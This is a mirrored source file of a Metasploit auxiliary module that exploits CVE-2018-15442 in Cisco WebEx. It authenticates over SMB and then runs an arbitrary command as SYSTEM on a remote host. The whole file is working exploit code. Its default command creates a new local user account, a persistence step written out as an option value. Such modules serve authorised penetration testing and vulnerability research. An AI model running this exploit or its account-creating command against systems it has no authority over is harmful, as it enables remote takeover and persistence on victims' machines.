Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/smb/webexec_command.rb
31419 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::SMB::Client::WebExec

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::Scanner

10


11
  # Aliases for common classes

12
  SIMPLE = Rex::Proto::SMB::SimpleClient

13
  XCEPT = Rex::Proto::SMB::Exceptions

14
  CONST = Rex::Proto::SMB::Constants

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'WebEx Remote Command Execution Utility',

21
        'Description' => %q{

22
          This module enables the execution of a single command as System by exploiting a remote

23
          code execution vulnerability in Cisco's WebEx client software.

24
        },

25


26
        'Author' => [

27
          'Ron Bowes <[email protected]>',

28
        ],

29


30
        'License' => MSF_LICENSE,

31
        'References' => [

32
          ['URL', 'https://webexec.org'],

33
          ['CVE', '2018-15442'],

34
          ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]

35
        ],

36
        'Notes' => {

37
          'Stability' => [CRASH_SAFE],

38
          'SideEffects' => [IOC_IN_LOGS],

39
          'Reliability' => []

40
        }

41
      )

42
    )

43


44
    register_options([

45
      OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net user testuser testpass /add']),

46
      OptPort.new('RPORT', [true, 'The Target port', 445]),

47
      OptBool.new('FORCE_GUI', [true, 'Ensure a GUI is created via wmic', false]),

48
    ])

49
  end

50


51
  # This is the main control method

52
  def run_host(ip)

53
    @smbshare = datastore['SMBSHARE']

54
    @ip = ip

55


56
    # Try and authenticate with given credentials

57
    if connect

58
      begin

59
        smb_login

60
      rescue Rex::Proto::SMB::Exceptions::Error => e

61
        print_error("Unable to authenticate with given credentials: #{e}")

62
        return

63
      end

64


65
      command = datastore['COMMAND']

66
      if datastore['FORCE_GUI']

67
        command = "WMIC PROCESS CALL Create \"#{command}\""

68
      end

69


70
      wexec(true) do |opts|

71
        execute_single_command(command, opts)

72
      end

73


74
      print_good('Command completed!')

75
      disconnect

76
    end

77
  end

78
end

79


80